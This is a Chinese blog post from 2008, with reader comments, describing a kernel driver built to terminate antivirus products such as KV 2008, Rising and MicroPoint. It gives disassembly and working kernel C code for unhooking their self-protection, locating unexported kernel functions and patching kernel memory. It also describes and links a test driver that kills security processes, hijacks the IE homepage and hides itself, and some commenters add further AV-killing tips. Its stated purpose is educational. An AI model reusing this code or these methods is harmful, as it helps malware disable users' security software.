百度首页 | 百度空间
 
查看文章
 
[原创]干掉KV 2008, Rising等大部分杀软
2008年03月23日 星期日 10:25

友情提醒:[08/05/05]

3月份丢的测试程序,早就被杀软提取特征码,定性为病毒。若你现在才看到,并运行的话,不要问为什么没有效果,因为会被杀软识别为病毒,从而禁止运行。

前言:

此文章写作时间:2008/03/23
写这篇文章不是为了传播病毒技术,而是让广大的电脑安全爱好者对病毒常用的伎俩有一个比较清楚的认识,才能更好的防范. 写的很菜,老鸟飘过~

主题:
利用驱动结束掉大部分的安全软件(eg. KV 2008, 瑞星,微点, 360),禁止一些ARK(反rootkits安全工具)的运行.(当然,不考虑主动防御如何禁止驱动的加载,现在前提是驱动已经加载.所以只讨论一个层面)

                                                                         sudami [sudami@163.com]
                                                                                                                            
http://hi.baidu.com/sudami

正文:

这段时间机器狗,磁碟机来势汹汹,手段无所不用其极. 其实它们的实现不是什么困难的事,只是病毒作者用了很多猥亵手段,投入了大量的精力. 于是,偶琢磨着写个小程序玩一下:

<一> 对KV 2008的分析
ps: R3下Kill 进程已经被炉子牛做的差不多了(万一ZwDulplicatXXX被挂了就失效了),所以略过~~~

KV 2008前段时间鼓吹IS结束掉它,其实没什么神秘的地方.好多牛已经讨论过了.驱动下结束它很简单.打开RKU扫描一下, 为了保护自己的进程, 江民做了3处inline hook, 3处SSDT HOOK




SSDT 15秒恢复1次,其中的NtTerminateProcess恢复更快,基本是5ms左右(DPC)

①处理方法: 恢复掉关键的一处inline hook KeInsertQueueApc即可

②具体细节:
--------------------------------------------
(1)
KV2008的inline hook -- ObOpenObjectByPointer
防止打开其进程

!ObOpenObjectByPointer:
8056cbc2 8bff mov edi,edi
8056cbc4 e967e59c00 jmp 80f3b130 ;往下要恢复15字节的内容
8056cbc9 94 xchg eax,esp
8056cbca 0000 add byte ptr [eax],al
8056cbcc 00538b add byte ptr [ebx-75h],dl
8056cbcf 5d pop ebp
8056cbd0 085657 or byte ptr [esi+57h],dl
|
| 恢复为下面的
|
nt!ObOpenObjectByPointer:
8089fa62 8bff mov edi,edi
8089fa64 55 push ebp
8089fa65 8bec mov ebp,esp
8089fa67 81ec94000000 sub esp,94h
8089fa6d 53 push ebx
8089fa6e 8b5d08 mov ebx,dword ptr [ebp+8]
8089fa71 56 push esi
8089fa72 57 push edi

--------------------------------------------
(2)
KV2008的inline hook -- KeInsertQueueApc
防止插APC终止其进程

nt!KeInsertQueueApc:
804e6411 8bff mov edi,edi
804e6413 e9286da500 jmp 80f3d140 ;往下要恢复7字节的内容
804e6418 0c53 or al,53h
|
| 恢复为下面的
|
nt!KeInsertQueueApc:
8080ecbf 8bff mov edi,edi
8080ecc1 55 push ebp
8080ecc2 8bec mov ebp,esp
8080ecc4 83ec0c sub esp,0Ch
8080ecc7 53 push ebx

--------------------------------------------
(3)
KV2008的inline hook -- RtlImageNtHeader
防止别人打开指定的PE模块

nt!RtlImageNtHeader:
804f97d5 90 nop ;往下要恢复26字节的内容
804f97d6 90 nop
804f97d7 90 nop
804f97d8 90 nop
804f97d9 90 nop
804f97da 90 nop
804f97db 90 nop
804f97dc 90 nop
804f97dd 90 nop
804f97de 90 nop
804f97df e95cc99f00 jmp 80ef6140
804f97e4 90 nop
804f97e5 ff743866 push dword ptr [eax+edi+66h]
804f97e9 813a4d5a7531 cmp dword ptr [edx],31755A4Dh
|
| 恢复为下面的
|
nt!RtlImageNtHeader:
80822e19 8bff mov edi,edi
80822e1b 55 push ebp
80822e1c 8bec mov ebp,esp
80822e1e 8b5508 mov edx,dword ptr [ebp+8]
80822e21 33c0 xor eax,eax
80822e23 85d2 test edx,edx
80822e25 743d je nt!RtlImageNtHeader+0x41 (80822e64)
80822e27 83faff cmp edx,0FFFFFFFFh
80822e2a 7438 je nt!RtlImageNtHeader+0x41 (80822e64)
80822e2c 66813a4d5a cmp word ptr [edx],5A4Dh
80822e31 7531 jne nt!RtlImageNtHeader+0x41 (80822e64)

-----------------------------

③实践思路:

引用:
1. 得到KV 2008的进程句柄
2. 通过句柄得到EPROCESS,然后遍历每个THREAD,结束之。
[之前要恢复inline hook]


ObReferenceObjectByHandle 通过handle得到Object
PsLookupProcessByProcessId 通过ID得到Object
ObOpenObjectByPointer 通过Object得到handle

-->所以可以绕过ObOpenObjectByPointer 的hook,调用PsLookupProcessByProcessId得到KV 2008的Object(也就是间接实现NtOpenProcess的一部分).
(PsLookupProcessByProcessId可能被别人hook过了,所以比较安全的做法是自己实现这个函数,其实就是在句柄表中找Object.可参考前人文章)

--> 对每个Thread,都是调用PspTerminateThreadByPointer.而它调用了KeInsertQueueApc.故要恢复后再调用.


<二> 搜索未导出的函数地址
(1)得到的PsGetNextProcessThread地址

偶采用的方法比较的笨,首先得到NtTerminateProcess的地址,再从中获取PsGetNextProcessThread。

弊端有3:
① 这个函数就是得到一个EPROCESS的所有ETHREAD,完全可以自己实现,只是BSOD的几率会增大(实现代码见下)

//
//
//
BOOLEAN
ReferenceObject(
PVOID Object
)
{
POBJECT_HEADER ObjectHeader;

ObjectHeader = (POBJECT_HEADER)((ULONG)Object - sizeof(OBJECT_HEADER));

if (ObjectHeader->PointerCount == 0)
{
return FALSE;
}

InterlockedIncrement( &ObjectHeader->PointerCount );

return TRUE;
}

//
// 自己实现PsGetNextProcessThread
//
PETHREAD
SD_PsGetNextProcessThread (
PEPROCESS Process,
PETHREAD Thread
)
{
PETHREAD FoundThread;
PLIST_ENTRY Entry;
PLIST_ENTRY ThreadListEntry;
PLIST_ENTRY ListHead;

//DbgPrint( "GetNextProcessThread( 0x%08x, 0x%08x )", Process, Thread );

FoundThread = NULL;

if (Thread != NULL) {
ThreadListEntry = (PLIST_ENTRY)((ULONG)Thread + ThreadProc);
Entry = ThreadListEntry->Flink;
} else {
ThreadListEntry = (PLIST_ENTRY)((ULONG)Process + ThreadListHead);
Entry = ThreadListEntry->Flink;
}

ListHead = (PLIST_ENTRY)((ULONG)Process + ThreadListHead);

while (ListHead != Entry) {
FoundThread = (PETHREAD)((ULONG)Entry - ThreadProc);

if (ReferenceObject( FoundThread )) {
break;
}

FoundThread = NULL;
Entry = Entry->Flink;
}

if (FoundThread != NULL) {
ObDereferenceObject( FoundThread );
}

DbgPrint( "线程地址: \t0x%08x \n", FoundThread );

return FoundThread;
}

② 有人说:“怎么不直接搜索PsGetNextProcessThread的特征码?”
sudami:我KD看了下不同的内核,函数因为寄存器的改动变化的比较大,不好定位

③ 有人说:“得到NtTerminateProcess的地址可以直接在SDT中取得嘛”
sudami:KV 2008 注册了一个DPC,5ms恢复一次对NtTerminateProcess的hook.所以要得到它的原始地址,还得自己读内核文件,在里面找到真实地址,颇为烦琐,于是我就直接搜索它的特征码, 看了一些内核,特征码还算稳定

nt!NtTerminateProcess:
808b5399 8bff mov edi,edi
808b539b 55 push ebp
808b539c 8bec mov ebp,esp
...
808b542a c7450822010000 mov dword ptr [ebp+8],122h
808b5431 e8e8a2ffff call nt!PsGetNextProcessThread (808af71e)
808b5436 8bf0 mov esi,eax.

部分code如下:


// 经过一系列的读PE后,得到一些偏移值。计算PE在内存中需要的空间。
// 为其分配一个非分页内存
// 将文件的内容都读取到这里
// 获取文件的大小,申请一块内存来存放它
//DbgPrint("获取文件的大小,申请一块内存来存放它\n");
ZwQueryInformationFile (ntFileHandle, &ioStatus, &fsi, sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation);

FileContent = ExAllocatePool (NonPagedPool, fsi.EndOfFile.LowPart);

if (FileContent == NULL)
{
ntStatus = STATUS_UNSUCCESSFUL;
ZwClose(ntFileHandle);

DbgPrint("ExAllocatePool Error\n");
goto End;
}

byteOffset.LowPart = 0;
byteOffset.HighPart = 0;

ntStatus = ZwReadFile(ntFileHandle,
NULL,
NULL,
NULL,
&ioStatus,
FileContent,
fsi.EndOfFile.LowPart,
&byteOffset,
NULL);

if (!NT_SUCCESS(ntStatus))
{
ZwClose(ntFileHandle);
ExFreePool(FileContent);

DbgPrint("ZwReadFile 将要读的内容,读到一片非分页内存失败 Error\n");
goto End;
}

if (fsi.EndOfFile.LowPart <= 0)
{
ntStatus = STATUS_NOT_FOUND;
ZwClose(ntFileHandle);
ExFreePool(FileContent);
DbgPrint("NeedSize <= 0 Error\n");
goto End;
}

GetHeaders (FileContent, &pfh, &poh, &psh);

//DbgPrint("psh: %08lx\n", (PVOID)psh);

//DbgPrint("start search....\n");
// 开始搜索。。。=.=!
for (i = 0; i < fsi.EndOfFile.LowPart; i++)
{
if ( (FileContent[i] == 0x8B) && (FileContent[i+1] == 0xFF) && (FileContent[i+2] == 0x55) && (FileContent[i+3] == 0x8B) &&
(FileContent[i+4] == 0xEC) && (FileContent[i+5] == 0x83) && (FileContent[i+6] == 0xEC) && (FileContent[i+7] == 0x10) &&
(FileContent[i+8] == 0x53) && (FileContent[i+9] == 0x56) && (FileContent[i+10] == 0x57) && (FileContent[i+11] == 0x64) &&
(FileContent[i+12] == 0xA1) && (FileContent[i+13] == 0x24) && (FileContent[i+14] == 0x01) && (FileContent[i+15] == 0x00) &&
(FileContent[i+16] == 0x00) && (FileContent[i+17] == 0x83) && (FileContent[i+18] == 0x7D) && (FileContent[i+19] == 0x08) &&
(FileContent[i+20] == 0x00) && (FileContent[i+21] == 0x8B) && (FileContent[i+22] == 0xF8) && (FileContent[i+23] == 0x8B) &&
(FileContent[i+24] == 0x47) && (FileContent[i+25] == 0x44) && (FileContent[i+26] == 0x89) && (FileContent[i+27] == 0x45) &&
(FileContent[i+28] == 0xF0) && (FileContent[i+29] == 0x0F) && (FileContent[i+30] == 0x84) )
{
//DbgPrint(" 进来了~\n");

DbgPrint("文件偏移i: %08lx\n", (PVOID)i);
// 找到了
sudami_1 = Offset2RVA( i, psh, pfh->NumberOfSections );

//DbgPrint("RVA -- sudami_1 : %08lx\n", (PVOID)sudami_1);

if (sudami_1 == 0) {
DbgPrint("sudami_1 == 0 Error\n");
goto NotFound;
}

if (sudami_1 > SizeOfImage) {
DbgPrint("sudami_1 > SizeOfImage Error\n");
goto NotFound;
}

sudami_1 += ModuleBase;

if (!MmIsAddressValid((PVOID)sudami_1 )) {
DbgPrint("!MmIsAddressValid((PVOID)sudami_1 ) Error\n");
goto NotFound;
}

NtTerminateProcess = (PUCHAR)sudami_1;
DbgPrint( "NtTerminateProcess:\t0x%08x\n", (ULONG)NtTerminateProcess );

ExFreePool(FileContent);
ZwClose(ntFileHandle);

goto End;
}

然后就好做了,下面是个很科普的函数:

VOID XPGetPsGetNextProcessThread()
{
PUCHAR cPtr;
PUCHAR addr;
int i = 0;

//DbgPrint("开始找PsGetNextProcessThread \n");

if( NULL == NtTerminateProcess) {
DbgPrint( "NtTerminateProcess NULL == \n" );
return;
}

for (cPtr = (PUCHAR)NtTerminateProcess;
cPtr < ((PUCHAR)NtTerminateProcess + PAGE_SIZE);
cPtr++) {

//DbgPrint("cPtr: \t0x%08x \n", cPtr);
if (*cPtr == 0xE8/* && *(PUSHORT)(cPtr + 5) == 0x8BF0 && *(PUSHORT)(cPtr + 7) == 0x85F6*/) {
i++;
//DbgPrint("--- 进来了--- \n");

if( 3 == i ) {
g_PsGetNextProcessThread =
(My_PsGetNextProcessThread)(*(PULONG)(cPtr + 1) + (ULONG)cPtr + 5);
DbgPrint( "PsGetNextProcessThread:\t0x%08x\n", (ULONG)g_PsGetNextProcessThread );

break;
}
}
}
}

(2)得到的PspTerminateThreadByPointer地址

前言: 微点连 PsTerminateSystemThread 也inline hook,真无耻~
nt!PsTerminateSystemThread:
808aa35f 8bff mov edi,edi
808aa361 55 push ebp
808aa362 8bec mov ebp,esp
808aa364 64a124010000 mov eax,dword ptr fs:[00000124h]
808aa36a f6804802000010 test byte ptr [eax+248h],10h
808aa371 0f84ea300800 je nt!PsTerminateSystemThread+0x14 (8092d461)
808aa377 ff7508 push dword ptr [ebp+8]
808aa37a 50 push eax
808aa37b e8a2e9cf77 call f85a8d22 ; 被inline hook了
;
; 本来是call nt!PspTerminateThreadByPointer (XXXXX),显然跳到了微点的处理
; 函数中, 若从这里找未导出的 PspTerminateThreadByPointer就不爽了, 所以要换
; 从其他的导出函数中搜索(前提是若你想调用PspTerminateThreadByPointer函数)
; -- sudami 08/03/16
;
808aa380 5d pop ebp
808aa381 c20400 ret 4


整理下思绪,直接在内部调用过PspTerminateThreadByPointer的函数有4个:
NtTerminateProcess、NtTerminateThread、PspTerminateProcess [未导出]
PsTerminateSystemThread [已导出]

引用:

1.> 对于NtTerminateProcess, 还得先得到ZwTerminateProcess的地址(已导出),取出其服务号,再到SST中找;而且若被其他安全软件hook了,找到的还不是原始地址.
恢复SSDT也不是保险的方法, eg: KV 2008注册了个DPC,每隔5ms恢复一次对NtTerminateProcess的hook,所以基本不可能得到原始的地址.
或者你可以读ntoskrnl.exe,重定位后找到原始的NtTerminateProcess.这样是可行的,不过比较繁琐~

引用:

2.> PsTerminateProcess是对PspTerminateProcess的包装.而它们都没有在已导出的函数中调用过.故此路不通.

引用:

3.> 搜索PsTerminateSystemThread应该是最简单的,可恰恰MicroPoint又在里面做了手脚.


综上,要让自己的驱动能稳定的对抗现行的各大杀软, 上面的方法都不可取.
[前提: 你希望得到PspTerminateThreadByPointer的地址,以便强行关闭现行的各大杀软(KV 2008除外)]

先看下面这个搜索的函数:

VOID XPGetPspTerminateThreadByPointer()
{
PUCHAR cPtr;

DbgPrint( "PsTerminateSystemThread:\t0x%08x", PsTerminateSystemThread );

for (cPtr = (PUCHAR)PsTerminateSystemThread;
cPtr < (PUCHAR)PsTerminateSystemThread + PAGE_SIZE;
cPtr++)
{
if (*cPtr == 0xE8 && *(PUSHORT)(cPtr + 5) == 0xC25D)
{
PspTerminateThreadByPointer =
(PSPTERMINATETHREADBYPOINTER)(*(PULONG)(cPtr + 1) + (ULONG)cPtr + 5);
DbgPrint( "PspTerminateThreadByPointer:\t0x%08x",
(ULONG)PspTerminateThreadByPointer );
break;
}
}
}

若机器装了MP,就失败了,BSOD是显而易见的.

这样一分析,到是原来简便的方法不稳定了,那就不妨试下最笨的方法 -- 读取ntoskrnl.exe(或者其他内核)到一块NonPagedpool中,在里面搜索特征码.可以搜索函数头,也可以搜索函数体. 但是操作系统的版本和补丁问题,这样找起来也不是很稳定.

偶机器是ntoskrnl.exe

lkd> dd PspTerminateThreadByPointer
8089c971 8b55ff8b 0cec83ec fff84d83 7d8b5756
8089c981 48b78d08 f6000002 45c74006 f0bdc0f4
8089c991 ae850fff 64000909 000124a1 0ff83b00
8089c9a1 018e0985 40c03300 ff0609f0 18e80c75
8089c9b1 90fffffd 90909090 2068106a e8808155
8089c9c1 fff6f4be 0508458b 000001d4 850f0039
8089c9d1 0003e960 f6f4e4e8 0004c2ff e9344e8d
8089c9e1 ffffae92 90909090

所以偶是这样做的: 判断机器有微点,就搜索文件得到地址,否则直接用导出的函数来搜索地址

(3) 恢复江民的 KeInsertQueueApc inline hook

BYTE KeInsertQueueApc_orig_code[9] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C, 0x53 };

//
// 恢复KeInsertQueueApc的inline hook
//
VOID XPRestoreKeInsertQueueApc ()
{
PUCHAR addr;
KIRQL oldIrql;

addr = (PUCHAR) GetFunctionAddr( L"KeInsertQueueApc" );

// 禁止系统写保护,提升IRQL到DPC,然后恢复KeInsertQueueApc的Inline Hook
WPOFF();
oldIrql = KeRaiseIrqlToDpcLevel();

// 恢复KeInsertQueueApc的前字节
RtlCopyMemory ( (BYTE*)addr, KeInsertQueueApc_orig_code, 9 );

KeLowerIrql(oldIrql);

WPON();

//DbgPrint("XPRestoreKeInsertQueueApc Success\n");
}

<三 运行效果>

程序运行后:
1. 5ms一次遍历安全软件进程,发现就kill掉。很暴力~~~
2. 修改IE首页,反复写注册表
3. 隐藏sudami.sys,文件占炕,防止被删



其实没必要做这么多辅助的东西,只是为了试验下效果. 比如:

1. kill进程最好自己实现结束进程的全过程,恢复一些必须的inline hook,每次调用前恢复一次.其实一路写到PspExitThread很不稳定, 因为IRQL,线程调度, 线程等待状态等各种原因,容易BSOD~ 俺这里偷懒了.

2. 修改IE首页就是调用ZwXXX系列,一个线程反复的写.和piaoxue的驱动差不多. 其实简单的调用一个更底层的函数CmXXXX就可以防范了.

3. 隐藏文件,无非是SSDT hook,只是加了个KTimer反复hook,骗骗菜鸟还行 ;
文件占炕防止驱动被删, 关掉句柄就可以了.或者用360文件粉碎机 --> 重启删除 (若是病毒作者,可以判断是否有安全软件在尝试这种"重启删除"的行为,是则立即删注册表的那个标记,再蓝掉 ,偶不是病毒制造者,所以就不做了)

4. 还有其他的诸如替换beep.sys, 感染mpXXX.sys, R3层加个线程弹网页, 禁用"组策略",autorun.inf等等,病毒用的很多, 实现起来也不复杂,所以同学们不要觉得很神秘.知道原理就能防患于未然.

------------------------------------------------------------------------------------------------------
驱动无壳无花,可IDA直接F5.

附件为测试程序. 请不要在主机上运行. 万一中毒,设置注册表的修改权限为"完全禁止",重启后删除C:\WINDOWS\SYSTEM32\Driver\sudami.sys 即可.


-------------------------------------------------------------
参考资料

(1) 搜索未导出的函数地址
(2) 句柄啊,3层表啊,ExpLookupHandleTableEntry啊
(3) PsLookupProcessByProcessId执行流程
(4) 360SuperKill--恢复FSD的IRP处理函数
(5) WRK,ReactOS

附件

kanxue: 文件类型: rar kill_SecuritySoftware.rar (2008-03-23 09:59, 80.2 KB, 529 次下载)
5d6d: kill_SecuritySoftware.rar (80.23 KB)

网盘:sudami.ys168.com

可能因为内核补丁的缘故,在有些机器上会出现没有效果的情况,属正常


类别:Note | 浏览() | 评论 (25)
 
最近读者:
 
网友评论:
1
2008年03月23日 星期日 10:52
很强大。苏打米就是有那种不怕老虎的精神,哈,被你吓到了。一路读下来都没敢喘气。
这玩意在已经公开的东西里面算不错的了。要不再加个 phide 引擎?呵呵。
 
2
2008年03月23日 星期日 11:00
汗,俺没做进程隐藏和进程防杀的.

没必要嘛.要做完全可以实现滴~
=.=!
 
3
2008年03月23日 星期日 11:47
好麻烦——麻烦啊~
怕麻烦,所以hook了一下swap,敌人没有必要得到调度。
 
5
2008年03月23日 星期日 11:56
汗,V大够绝的.

线程调度里做手脚最爽了~
 
6
2008年03月23日 星期日 12:04
Hook Swap 对抗敌人在驱网不是 V 大第一个爆的,BS 一下。有好东西居然不爆出来……
 
7
2008年03月23日 星期日 16:10
请问RKU是什么?在哪下?谢谢!
 
8
2008年03月23日 星期日 19:01
是一种安全工具:

http://sudami.5d6d.com/thread-69-1-1.html
 
9
2008年03月23日 星期日 22:27
你最喜欢用微点,这不叫微点的人来不是不是 啊哈后
 
11
2008年03月24日 星期一 20:03
汗啊发错了不是这个
 
12
2008年03月24日 星期一 21:19
什么啊~
 
14
2008年04月11日 星期五 17:28
邪恶的冰冻进程。。。
 
16
2008年04月11日 星期五 20:52
“邪恶的冰冻进程。。。”

是不是wowocook大牛的 ProcCtrlsys.sys啊?

驱动加了花,好像还有壳,搞了下放弃了~~~
 
17
2008年04月15日 星期二 18:08
强!
 
18
2008年04月19日 星期六 06:09
不错,果然开眼了!之前只知道用冰刃的高级扫描可以解内联挂钩,然后手脚快点可以杀KV2008(正版)。

不过有点小遗憾:为什么加载驱动会被拦截一次呢?我记得我在用户级加驱动没被拦过,是不是你的加载是用的内核函数啊?象is一样。。。
 
19
2008年04月19日 星期六 06:32
非常感谢sudami仁兄解决了江民2008,最重要是解内联的方法确很受教育,前不久为编它经常蓝频。结合以前的驱动方面的代码,已经可以有效杀Rising,KingSoft,Kapersky6/7,今天又发现了KV2008的部分代码。差不多可以作个大“专杀”了。呵呵......

哥们本事很强!不过有个问题得唠叨下。最好别干完了杀软就上你的网页,有可能引起...怪我多嘴吧!但要是有心人破解不了你的程序就直接用你的程序模块干KV2008是不是对你不大好啊?

今后有空一定常上你的Blog学习,的确不错!!!

我用的email是校内的,如果不嫌弃小菜我今后多联系吧...呵呵
QQ:448702926
 
21
2008年04月19日 星期六 07:01
汗,这个肯定过不了主防的.加载驱动用的是ZwLoadDriver.

测试程序嘛,随便写写,看看效果就可以了啊. 驱动无壳,基本别人用F5后就直接看到源码了.嘿嘿~~~
 
22
2008年04月19日 星期六 07:45
我对有些东西是知道点理论但编程实现困难,不过你们这里驱动方面的东西适和菜鸟进阶。可惜快大四了......考完研再慢慢爽吧!

你刚才提到了ZwLoadDriver,但是KV和国产一大批杀毒软件不怎么拦。倒是喀吧烦人!

如果你想直接运行过喀吧得用点诡异但原理简单的手段,用内存清零可以暂时杀掉喀吧用户名进程(监控用的),然后全局修复下SSDT就OK了!到时候任务管理器或是设个taskkill /f /im * 就行。

你可以玩下,应该行的
 
23
2008年04月19日 星期六 07:48
哎!可惜啊!
有关驱动的调试方面的一些问题我只有以后再向你请教罗!
 
24
2008年04月19日 星期六 07:48
哈哈,你也大3啊.我也和你一样大3啊.

我不考研,考研个人感觉浪费时间和精力. 读完3年到时候还得找工作~~~
 
25
2008年04月19日 星期六 07:55
有理想!我在网上找了很多破KV2008的资料,个人认为你说的应该是最本质的了。嘿嘿!只要大家不换XP SP2,这种内核加载方法几乎总能用。

到时候大四寒假多联系吧!我有很多想学的了!

 
26
2008年04月19日 星期六 08:27
- -
 
29
2008年04月23日 星期三 09:45
小兄弟 是人才!
 
30
2008年04月30日 星期三 07:48
发现还有人关注此帖,于是补充一下,防止贻误:

发表于 2008-4-30 07:43 只看该作者
引用:
原帖由 starrick 于 2008-4-25 20:48 发表
似乎这东西无法结束ProSecurity的进程~

引用:
如果是“利用驱动结束掉大部分的安全软件”的话,貌似对ZA无效……

回复:
这个程序主要针对 KV 2008。
没有考虑ProSecurity、ZA等软件。 把他们加入黑名单,一样能kill掉。

到现在,KV 2008升级到最新,这个程序还是能Kill掉它,只要稍微的改变下特征码,KV 2008就不报毒了。

看来江民的开发团队,是只顾表面,不搞实质,测试程序出来一个多月了,只是简单的提取下特征码,其他的什么都没干。。。
 
31
2008年04月30日 星期三 12:14
嘿,顶一下儿,牛人啊~ 就应该收拾拾它们~ 很烦江民拿进程保护打广告~
 
32
2008年07月14日 星期一 15:18
呵呵,江民,o(∩_∩)o...哈哈
玩杀软向来是我的梦想,嘿嘿
学习了,呵呵
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码:
 

     

©2008 Baidu